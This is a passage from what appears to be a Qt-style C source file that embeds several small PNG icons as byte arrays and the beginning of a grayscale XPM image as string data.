    0x97, 0x88, 0x55, 0x1f, 0xe6, 0xa2, 0xcb, 0xc4, 0x96, 0x9a, 0x89, 0x4b,
    0xcb, 0x6f, 0x23, 0xee, 0x36, 0x1a, 0xab, 0x62, 0xe2, 0x52, 0xc5, 0x72,
    0x94, 0xdf, 0xbf, 0xb6, 0x10, 0xbb, 0xf2, 0xc8, 0x97, 0xb8, 0xa4, 0x6c,
    0xc6, 0x67, 0x7e, 0xaa, 0x51, 0x95, 0x71, 0xfa, 0x08, 0x7e, 0xa8, 0x37,
    0x62, 0xda, 0x9a, 0xba, 0xcb, 0x20, 0x23, 0x5f, 0x00, 0x00, 0x00, 0x00,
    0x49, 0x45, 0x4e, 0x44, 0xae, 0x42, 0x60, 0x82
};

static const unsigned char image10_data[] = { 
    0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00, 0x00, 0x0d,
    0x49, 0x48, 0x44, 0x52, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x16,
    0x08, 0x06, 0x00, 0x00, 0x00, 0xc4, 0xb4, 0x6c, 0x3b, 0x00, 0x00, 0x00,
    0xd5, 0x49, 0x44, 0x41, 0x54, 0x38, 0x8d, 0xc5, 0x95, 0x5d, 0x0a, 0x84,
    0x30, 0x0c, 0x84, 0x27, 0xe2, 0xa9, 0x0a, 0x9e, 0x6c, 0x8b, 0x0f, 0x4b,
    0x3d, 0xd9, 0x82, 0xd7, 0xca, 0x3e, 0x58, 0xd7, 0xfe, 0x4c, 0xd0, 0xba,
    0x5d, 0x76, 0x40, 0x02, 0x4d, 0xf2, 0x65, 0xda, 0x0a, 0x05, 0x7e, 0x24,
    0x39, 0xc9, 0xeb, 0x8d, 0x9e, 0xaa, 0x88, 0x41, 0xa0, 0xc9, 0xaa, 0xd8,
    0xc8, 0x2a, 0xb3, 0x2f, 0x9c, 0x42, 0x5b, 0xe1, 0xe3, 0x0e, 0x0d, 0xcf,
    0x00, 0xc0, 0x03, 0x08, 0xf0, 0xb3, 0xa7, 0xa0, 0x74, 0x10, 0xa9, 0xd7,
    0x14, 0x2e, 0x00, 0xb4, 0x2c, 0x5a, 0x5f, 0xab, 0x69, 0x6b, 0x97, 0x9b,
    0x1c, 0x83, 0x7f, 0xc0, 0xc3, 0x16, 0xb6, 0xe4, 0x16, 0x5b, 0x64, 0xf7,
    0x8d, 0x71, 0x63, 0x59, 0x91, 0x9b, 0xdc, 0x45, 0x70, 0xde, 0x47, 0xc0,
    0x47, 0x32, 0xdd, 0x5e, 0x5b, 0xcc, 0x35, 0xf0, 0xc9, 0x77, 0x62, 0xae,
    0x78, 0x79, 0x36, 0xdc, 0xcf, 0x75, 0x13, 0x57, 0x7e, 0x79, 0xf4, 0x8c,
    0x4b, 0x27, 0xaa, 0x0f, 0x13, 0x27, 0xb2, 0x40, 0xf5, 0x11, 0x7f, 0xcb,
    0xe3, 0x48, 0xaa, 0x33, 0xb6, 0xe0, 0x22, 0x4b, 0x05, 0x4d, 0x07, 0x46,
    0xb8, 0x02, 0x5e, 0x2e, 0x3b, 0x3e, 0x73, 0xcd, 0xe0, 0xdd, 0x1c, 0x97,
    0xf0, 0x2e, 0x8e, 0xd9, 0xd0, 0xaf, 0x1d, 0xb3, 0x81, 0x22, 0x4b, 0xdf,
    0x33, 0xee, 0xe6, 0x98, 0xa9, 0x34, 0xa0, 0xf6, 0x17, 0xb4, 0x55, 0x40,
    0xd0, 0x0b, 0xcf, 0x4c, 0xa0, 0x8f, 0xc0, 0xdf, 0xf4, 0x06, 0xe3, 0x25,
    0xc1, 0x98, 0x1b, 0xc4, 0x18, 0x76, 0x00, 0x00, 0x00, 0x00, 0x49, 0x45,
    0x4e, 0x44, 0xae, 0x42, 0x60, 0x82
};

static const unsigned char image11_data[] = { 
    0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00, 0x00, 0x0d,
    0x49, 0x48, 0x44, 0x52, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x16,
    0x08, 0x06, 0x00, 0x00, 0x00, 0xc4, 0xb4, 0x6c, 0x3b, 0x00, 0x00, 0x02,
    0x5d, 0x49, 0x44, 0x41, 0x54, 0x38, 0x8d, 0xd5, 0x93, 0xa1, 0x72, 0xdb,
    0x40, 0x10, 0x86, 0x3f, 0x67, 0x0a, 0x56, 0xec, 0xc4, 0x22, 0x78, 0xd0,
    0x65, 0x36, 0x93, 0xa0, 0xc2, 0x1c, 0x68, 0xd6, 0xc2, 0xe6, 0x0d, 0xf2,
    0x1a, 0x81, 0x81, 0x11, 0x34, 0x94, 0x99, 0xc2, 0x54, 0xa8, 0x32, 0x9b,
    0x55, 0xf0, 0xe0, 0x89, 0xdd, 0xb1, 0x5b, 0xa6, 0x02, 0xb7, 0x9d, 0x66,
    0x92, 0xd6, 0x99, 0xb6, 0xd3, 0x99, 0xfe, 0xe8, 0x6e, 0x67, 0xe7, 0xdb,
    0x7f, 0x77, 0xef, 0xe0, 0x7f, 0xd3, 0xe2, 0xc7, 0x4b, 0xd7, 0x75, 0xb3,
    0x73, 0x0e, 0xef, 0x3d, 0x51, 0x15, 0x00, 0x23, 0x82, 0xb5, 0x16, 0x6b,
    0x2d, 0x57, 0x57, 0x57, 0x8b, 0x17, 0x29, 0xbf, 0x02, 0xb7, 0x6d, 0x3b,
    0x0f, 0x87, 0x03, 0xb9, 0x2d, 0x58, 0xae, 0xd7, 0x60, 0x04, 0x00, 0xef,
    0x1c, 0xe3, 0xc7, 0x03, 0x06, 0xa8, 0xaa, 0x8a, 0xeb, 0xeb, 0xeb, 0x57,
    0xc1, 0x17, 0xdf, 0xa0, 0x6d, 0xdb, 0x52, 0x5d, 0xd7, 0x54, 0xef, 0xb6,
    0x00, 0xa8, 0x2a, 0x49, 0x13, 0x8a, 0x12, 0x35, 0x32, 0xec, 0x3a, 0xc4,
    0x2b, 0x9b, 0xcd, 0xe6, 0x55, 0xce, 0x2f, 0xfa, 0xbe, 0x9f, 0x87, 0xc3,
    0x40, 0xfd, 0xe1, 0x3d, 0xcb, 0x4d, 0x8d, 0xaa, 0xa2, 0x4e, 0x48, 0xee,
    0x12, 0xc6, 0x82, 0x38, 0x08, 0xc1, 0x07, 0x96, 0x9b, 0x1a, 0x8a, 0x9c,
    0xe3, 0xf1, 0xf8, 0xaa, 0x51, 0x5c, 0x38, 0xe7, 0xc8, 0xad, 0xa5, 0xaa,
    0x6b, 0x00, 0xc4, 0x5f, 0x12, 0x9c, 0x67, 0xd2, 0x23, 0x93, 0x8c, 0x88,
    0xe6, 0xc8, 0x60, 0xd1, 0x18, 0xb1, 0xd5, 0x92, 0xd1, 0x39, 0xba, 0xae,
    0x9b, 0xcf, 0x83, 0xa7, 0x89, 0x65, 0xb5, 0x46, 0x51, 0x34, 0x80, 0x1b,
    0x1d, 0x2e, 0x1f, 0x49, 0x45, 0xc0, 0xe3, 0x50, 0x09, 0x64, 0x08, 0xea,
    0x15, 0x44, 0x90, 0xc2, 0xe0, 0xbd, 0x3f, 0xef, 0x58, 0x53, 0xc2, 0xe4,
    0x86, 0xa0, 0x01, 0x9f, 0x4d, 0x84, 0xf5, 0x84, 0x18, 0x41, 0x83, 0x62,
    0xb0, 0x40, 0x8e, 0x8b, 0x23, 0xc9, 0x24, 0x50, 0x10, 0x93, 0x31, 0x4d,
    0xd3, 0x59, 0xf0, 0x1b, 0x80, 0x98, 0x14, 0x11, 0x20, 0x25, 0x14, 0x40,
    0x15, 0xf1, 0x96, 0x4c, 0x0b, 0xbc, 0x1b, 0x48, 0x4b, 0x07, 0xe4, 0x68,
    0x88, 0x80, 0xc0, 0x29, 0xeb, 0xd7, 0x8e, 0x41, 0x41, 0xf5, 0xb4, 0x34,
    0xfd, 0x76, 0x86, 0x4c, 0x05, 0x3f, 0x1e, 0x08, 0x4b, 0x0f, 0x85, 0x80,
    0x26, 0x54, 0x40, 0x63, 0x40, 0x44, 0xce, 0x83, 0x8b, 0xbc, 0xc0, 0x39,
    0x87, 0xa6, 0x13, 0x50, 0xa3, 0xa2, 0x28, 0x5e, 0x1d, 0x5a, 0x44, 0x14,
    0xd0, 0x70, 0x8a, 0xa5, 0x98, 0x08, 0x21, 0x62, 0xad, 0x3d, 0x0f, 0xb6,
    0xd6, 0xe2, 0x87, 0xcf, 0xa4, 0x98, 0x50, 0x8d, 0x27, 0x40, 0x50, 0x44,
    0x73, 0x70, 0x42, 0x8c, 0x91, 0xaf, 0x8d, 0x10, 0xfd, 0x44, 0x81, 0x60,
    0x8c, 0x39, 0x0b, 0x5e, 0x00, 0xdc, 0xdd, 0xdd, 0xcd, 0x8e, 0x80, 0xa9,
    0xde, 0x42, 0x02, 0x48, 0xe8, 0x04, 0x84, 0x08, 0x56, 0xf0, 0x3e, 0x02,
    0x90, 0x7d, 0x72, 0x94, 0x65, 0xc9, 0xba, 0x5a, 0xe3, 0x46, 0x87, 0x31,
    0xe6, 0xa7, 0x9f, 0xe5, 0x02, 0x60, 0xb5, 0x5a, 0x61, 0x02, 0xc4, 0xee,
    0x40, 0xa6, 0x89, 0x4c, 0x33, 0xf2, 0xcb, 0x0c, 0xb1, 0x06, 0x51, 0x28,
    0x14, 0xf8, 0xf8, 0x99, 0xb2, 0x2c, 0xb9, 0xb9, 0xb9, 0x59, 0xb8, 0xd1,
    0xf1, 0xf8, 0xf8, 0x48, 0xd3, 0x34, 0xb4, 0x6d, 0xfb, 0xe2, 0x9b, 0xfe,
    0x5e, 0xad, 0xef, 0xfb, 0xf9, 0x78, 0x3c, 0x32, 0x3a, 0x87, 0x18, 0x81,
    0xec, 0xb4, 0x20, 0x0d, 0x11, 0x51, 0xa8, 0xeb, 0x9a, 0xed, 0x76, 0xbb,
    0x00, 0x18, 0x86, 0x61, 0xee, 0xba, 0x8e, 0xfd, 0x7e, 0x8f, 0x31, 0x86,
    0xed, 0x76, 0xcb, 0x6a, 0xb5, 0x7a, 0xe2, 0xfe, 0x59, 0x1b, 0x5d, 0xd7,
    0xcd, 0xde, 0x7b, 0x62, 0x8c, 0x88, 0x08, 0x79, 0x9e, 0x63, 0xad, 0xa5,
    0xaa, 0xaa, 0x67, 0xb9, 0xbb, 0xdd, 0x6e, 0x6e, 0x9a, 0x06, 0xef, 0x3d,
    0x75, 0x5d, 0x3f, 0x29, 0xfe, 0xc7, 0xea, 0xfb, 0x7e, 0xbe, 0xbd, 0xbd,
    0x9d, 0xad, 0xb5, 0x73, 0x59, 0x96, 0xf3, 0xfd, 0xfd, 0xfd, 0xfc, 0xa2,
    0xe3, 0xdf, 0xd5, 0xc3, 0xc3, 0xc3, 0xdc, 0x34, 0x0d, 0xd3, 0x34, 0xb1,
    0xd9, 0x6c, 0xfe, 0x1e, 0x18, 0x4e, 0x63, 0xdc, 0xef, 0xf7, 0xa4, 0x94,
    0xfe, 0x26, 0xf6, 0x1f, 0xe9, 0x0b, 0xbc, 0x4c, 0x5e, 0x59, 0xd6, 0x14,
    0xca, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x49, 0x45, 0x4e, 0x44, 0xae, 0x42,
    0x60, 0x82
};


static const char* const image28_data[] = { 
"150 138 256 2",
"bR c #000000",
"bS c #010101",
"bN c #020202",
"bO c #030303",
"bI c #040404",
"bJ c #050505",
"bL c #060606",
"br c #070707",
"aO c #080808",
"ag c #090909",
"af c #0a0a0a",
"ar c #0b0b0b",
"ae c #0c0c0c",
"ai c #0d0d0d",
"ah c #0e0e0e",
"av c #0f0f0f",
".y c #101010",
".k c #111111",
".l c #121212",
".j c #131313",
".i c #141414",
".x c #151515",
".H c #161616",
".I c #171717",
".J c #181818",
".G c #191919",
".S c #1a1a1a",
".T c #1b1b1b",
".0 c #1c1c1c",
".K c #1d1d1d",
".1 c #1e1e1e",
".3 c #1f1f1f",
".R c #202020",
".2 c #212121",
".9 c #222222",
"#. c #232323",
"#g c #242424",
"#d c #252525",
"#f c #262626",
"#e c #272727",
"#n c #282828",
"#o c #292929",
"#r c #2a2a2a",
"#K c #2b2b2b",
"#w c #2c2c2c",
".Z c #2d2d2d",
"#A c #2e2e2e",
"al c #2f2f2f",
"#F c #303030",
"## c #313131",
"aA c #323232",
"#h c #333333",
"aE c #343434",
".m c #353535",
".4 c #363636",
"aQ c #373737",
".U c #383838",
"aT c #393939",
"aV c #3a3a3a",
"a0 c #3b3b3b",
".8 c #3c3c3c",
"aw c #3d3d3d",
"bc c #3e3e3e",
"#T c #3f3f3f",
"#X c #404040",
"bb c #414141",
"a9 c #424242",
"a3 c #434343",
"am c #444444",
".h c #454545",
"aX c #464646",
"au c #474747",
"#m c #484848",
"bz c #494949",
"#p c #4a4a4a",
"aU c #4b4b4b",
".o c #4c4c4c",
"ac c #4d4d4d",
"aR c #4e4e4e",
"bD c #4f4f4f",
".n c #505050",
"#2 c #515151",
"aM c #525252",
"bE c #535353",
"bG c #545454",
"ba c #555555",
"ak c #565656",
"#v c #575757",
"bH c #585858",
"#L c #595959",
".z c #5a5a5a",
"bM c #5b5b5b",
"aW c #5c5c5c",
"#U c #5d5d5d",
"b1 c #5e5e5e",
"aB c #5f5f5f",
"bZ c #606060",
"bu c #616161",
"bt c #626262",
".w c #636363",
"b4 c #646464",
"b6 c #656565",
"aq c #666666",
"bQ c #676767",
"ab c #686868",
"#E c #696969",
"#B c #6a6a6a",
"bd c #6b6b6b",
"b. c #6c6c6c",
"a6 c #6d6d6d",
"a4 c #6e6e6e",
"an c #6f6f6f",
"aJ c #707070",
"aY c #717171",
"a5 c #727272",
"b2 c #737373",
".g c #747474",
"bq c #757575",
"#Y c #767676",
"bw c #777777",
".F c #787878",
"#Q c #797979",
"a# c #7a7a7a",
".L c #7b7b7b",
"ad c #7c7c7c",
"bC c #7d7d7d",
"bl c #7e7e7e",
"b8 c #7f7f7f",
"#P c #808080",
"as c #818181",
"#s c #828282",
"#G c #838383",
"b9 c #848484",
"aH c #858585",
"#6 c #868686",
"ay c #878787",
"a. c #888888",
"bX c #898989",
"aF c #8a8a8a",
"bK c #8b8b8b",
"aZ c #8c8c8c",
"#V c #8d8d8d",
"#1 c #8e8e8e",
".Q c #8f8f8f",
"az c #909090",
"#M c #919191",
"aS c #929292",
"aG c #939393",
"bB c #949494",
"#4 c #959595",
"ax c #969696",
"bU c #979797",
"b5 c #989898",
"#x c #999999",
"b3 c #9a9a9a",
"bj c #9b9b9b",
"be c #9c9c9c",
"bY c #9d9d9d",
"ao c #9e9e9e",
"#C c #9f9f9f",
"a1 c #a0a0a0",
"aa c #a1a1a1",
".Y c #a2a2a2",
"#R c #a3a3a3",
".f c #a4a4a4",
"bV c #a5a5a5",
"bx c #a6a6a6",
"#3 c #a7a7a7",
"bv c #a8a8a8",
"bA c #a9a9a9",
"#H c #aaaaaa",
"bF c #ababab",
"bn c #acacac",
"b7 c #adadad",
"aN c #aeaeae",
"aP c #afafaf",
"#i c #b0b0b0",
"aI c #b1b1b1",
"#7 c #b2b2b2",
"#9 c #b3b3b3",
".c c #b4b4b4",
"bT c #b5b5b5",
"#a c #b6b6b6",
"#q c #b7b7b7",
"#N c #b8b8b8",
"aC c #b9b9b9",
".p c #bababa",
"bP c #bbbbbb",
"a7 c #bcbcbc",
".5 c #bdbdbd",
"#5 c #bebebe",
"#J c #bfbfbf",
"aL c #c0c0c0",
"#D c #c1c1c1",
"bp c #c2c2c2",
"a2 c #c3c3c3",
"bW c #c4c4c4",
"ap c #c5c5c5",
"#Z c #c6c6c6",
".V c #c7c7c7",
"bk c #c8c8c8",
"aj c #c9c9c9",
"by c #cacaca",
"#I c #cbcbcb",
"bs c #cccccc",
"bi c #cdcdcd",
"bg c #cecece",
"aK c #cfcfcf",
".A c #d0d0d0",
".a c #d1d1d1",
"#j c #d2d2d2",
"bm c #d3d3d3",
"#8 c #d4d4d4",
"#W c #d5d5d5",
"#y c #d6d6d6",
"#b c #d7d7d7",
"at c #d8d8d8",
"b# c #d9d9d9",
"bh c #dadada",
"b0 c #dbdbdb",
".v c #dcdcdc",
".e c #dddddd",
".6 c #dedede",
".M c #dfdfdf",
"bo c #e0e0e0",
".b c #e1e1e1",
"#0 c #e2e2e2",
"#S c #e3e3e3",
".W c #e4e4e4",
"#k c #e5e5e5",
"#t c #e6e6e6",
"#c c #e7e7e7",
"bf c #e8e8e8",
"a8 c #e9e9e9",
".E c #eaeaea",
".7 c #ebebeb",
".N c #ececec",
"#O c #ededed",
".B c #eeeeee",
".X c #efefef",
".d c #f0f0f0",
"aD c #f1f1f1",
"#l c #f2f2f2",
"#u c #f3f3f3",
".C c #f4f4f4",
".P c #f5f5f5",
"#z c #f6f6f6",
".q c #f7f7f7",
".r c #f8f8f8",
".D c #f9f9f9",
".s c #fafafa",
".O c #fbfbfb",
".t c #fcfcfc",
".u c #fdfdfd",
".# c #fefefe",
"Qt c #ffffff",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQtQtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQtQtQtQtQt.#QtQtQt.#QtQtQtQtQt.a.a.bQtQtQtQtQt.c.d.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQt.#QtQtQtQtQt.e.f.g.h.i.j.j.k.l.l.i.m.n.o.p.q.r.s.t.uQtQtQtQt.#QtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQtQt.#QtQtQtQt.#Qt.v.w.x.l.l.l.y.l.l.k.l.i.j.l.l.i.i.z.A.B.C.D.t.uQtQtQt.#QtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQtQtQtQtQtQt.E.F.G.i.j.j.i.H.I.H.I.H.I.H.x.J.J.J.H.x.K.L.M.N.C.O.uQt.#QtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.P.Q.R.l.j.k.l.i.J.G.G.S.G.T.S.S.S.K.T.T.S.J.H.j.U.V.W.X.q.O.#QtQtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#Qt.O.Y.Z.j.k.l.j.x.J.J.S.T.0.T.R.1.2.R.2.3.0.K.3.1.0.G.I.4.5.6.7.C.D.#QtQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#Qt.a.8.k.l.l.j.i.H.I.G.T.1.R.2.R.9.9#.#.#.#..3.R.9.9#..1.K.H###a#b#c.C.s.uQtQtQtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.t.Q.T.i.l.l.j.i.x.I.T.T.1.3.2.9#.#d#e#e#d#f#d#g.2#.#.#d.9.9.0.H#h#i#j#k#l.D.uQtQtQt.#",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQt.#QtQt.e#m.j.l.l.i.x.J.J.T.K.3.9#.#.#g#g#g#d#n#o#e#n#e#d#g#..9#g#g#e.9.S.I#p#q.a.W#l.s.#QtQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQt.f.K.H.j.j.i.j.I.T.0.3.2.2#g#d#d#f#e#f#e#n#n#f#d#f#n#o#r#r#n#e#e#f#..S.G#s#a#j#t#u.O.#QtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#Qt.#QtQt.##c#v.k.j.i.J.x.H.I.T.1.2#.#g#f#e#n#n#e#e#f#f#e#n#e#e#n#o#r#w#w#o#e#d#f#g.S.j.U#x.p#y.E#z.tQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQtQtQt.c#g.H.H.H.I.I.J.T.0.K.3.2.9#.#f#f#n#n#e#n#n#n#e#n#n#n#e#e#o#n#n#n#r#A#e#f#e.T.j#B#C#D.v.B.DQtQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt#u#E.I.x.I.G.G.T.0.K.R.R.2.9#.#g#d#f#e#n#e#e#e#n#n#e#n#n#n#e#f#e#o#r#o#r#n#n#g#e.K.j#F#G#H#I.W.C.t.#",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQt#J#A.H.H.I.H.S.T.1.3.R.2.9#d#f#e#o#n#e#e#f#e#e#n#n#n#n#n#n#f#e#e#f#n#o#r#K#n#f#r#f.3.x.I#L#M#N#b#O.rQt",
"QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#.r#P.H.H.I.J.K.S.0.3.3.2.9#g#g#f#e#e#n#e#e#e#e#e#n#n#e#e#e#n#n#n#n#f#f#o#e#o#o#o#n#o#d.R.J.i#F#Q#R.V#S#u.t",
"QtQtQtQtQtQtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQt.##b#T.J.G.J.G.T.3.3.2#.#g#d#d#f#f#e#f#f#f#e#e#e#f#e#n#n#e#e#n#n#n#o#o#e#e#e#n#n#n#e#n#o#f#d.K.i.1#U#V.c#W.N.D",
"QtQtQtQtQtQtQtQtQtQt.#.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQt.#.V#e.G.S.J.T.0.1.2#.#d#f#f#f#d#e#n#e#e#e#f#e#e#e#e#n#e#e#e#n#e#e#n#o#o#e#e#e#n#n#n#e#n#K#r#n.R.x.H#X#Y.Y#Z#0.C",
"QtQtQt.#Qt.#QtQtQtQtQtQt.#Qt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt.#QtQtQtQt#N#..G.S.T.K.1.2#g#d#f#e#e#e#n#e#e#n#o#n#e#f#f#e#e#n#e#n#n#n#e#n#n#e#n#n#e#f#f#e#n#r#f#n#r#w#K#g.0.i#r.w#1#q#b.B",
"QtQt.#QtQt.#QtQtQtQt.#QtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt#R.T.J.T.K.1.1.9#e#e#f#o#o#o#r#r#o#n#e#r#o#n#e#n#e#n#n#e#n#n#n#e#e#n#n#e#e#f#f#f#n#o#r#e#o#e#K#o.9.R.k.R#2#Q#3#I#k",
"Qt.#.#Qt.#QtQt.#.#QtQtQt.#QtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQtQt#V.S.G.G.1.3.9#.#d#n#r#w#K#K#w#K#r#n#n#e#n#e#e#e#n#n#n#n#e#e#e#e#e#n#n#n#n#n#e#e#e#n#e#n#n#d#r#r#n#f.R.i.K#T#E#4#5.e",
